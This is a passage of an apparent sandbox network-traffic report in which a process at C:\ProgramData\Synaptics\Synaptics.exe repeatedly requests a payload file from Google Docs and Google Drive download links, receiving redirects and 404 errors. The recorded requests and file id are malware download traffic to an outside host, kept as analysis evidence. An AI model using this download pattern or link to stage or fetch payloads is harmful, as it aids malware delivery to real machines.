                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:28 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:28 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="v51KvKkEc0TpQet3CoUQ3w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:28 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      83 | 192.168.2.5 | 49905 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:28 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      84 | 192.168.2.5 | 49906 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:28 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      85 | 192.168.2.5 | 49907 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:28 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      86 | 192.168.2.5 | 49916 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:30 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:30 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Qto9OP0YPjT3lbG-CRBD3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      87 | 192.168.2.5 | 49915 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:30 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:30 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-GEHirKss7893W4K64XEO1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
88          192.168.2.5  49924        142.250.186.110  443               6192  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:23:31 UTC  345                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:31 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:31 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-R87Ytymu0Tjax35ZAPPq8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
89          192.168.2.5  49925        142.250.186.33   443               6192  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:23:31 UTC  388                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:31 UTC  1242               IN         HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC7hJMt4oSp2IxZFnYnEtaRuxCb5r-4375Tq40RwTgXsDV3Hub6upU6SlNqkR7bS_YA
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:31 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-_JcuSFna3hBFD-RJiBhzJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:31 UTC  148                IN
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not
2024-12-30 10:23:31 UTC  1390               IN
                                                                                                                                      Data Ascii: Found)!!1</title><style nonce="T6O0fIwif5hyY6uYuU7mdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:
2024-12-30 10:23:31 UTC  114                IN
                                                                                                                                      Data Ascii: Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
90          192.168.2.5  49930        142.250.186.33   443               6192  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:23:31 UTC  388                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:31 UTC  1243               IN         HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5UUxZqRUPDo_pyCXd14vXOoJJVgQCgWSjlpHRiBvt4fYZstKPd0nZ8T0E5L-8DuAKk
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:31 GMT
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-dbZHivfAaM3-m_kwhVXF3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:31 UTC  147                IN
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:23:31 UTC  1390               IN
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="WNk3zUV53hqTaEd2SO1-_A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:23:31 UTC  115                IN
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
91          192.168.2.5  49931        142.250.186.110  443               6192  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:23:31 UTC  345                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:31 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:31 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-D1B4vblHNkzuMZa5aSMdnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
92          192.168.2.5  49938        142.250.186.110  443               6192  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:23:32 UTC  345                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:32 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:32 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-cQcFAgvse4omjgAgmgP5CQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.5 | 49939 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:32 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:32 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC7WTuj94rufFDqZtwG7pxZoPH3_rR-ldvJA6TcgU5y2S8yRp6CpMZZNerOCl1lR-3-iEv1UpDE
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:32 GMT
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-8PMB9QibpD4S_cZPFcA4Mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:32 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:23:32 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="tYqYV_E3eDIXRanZaCeSCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:23:32 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.5 | 49940 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:32 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.5 | 49941 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
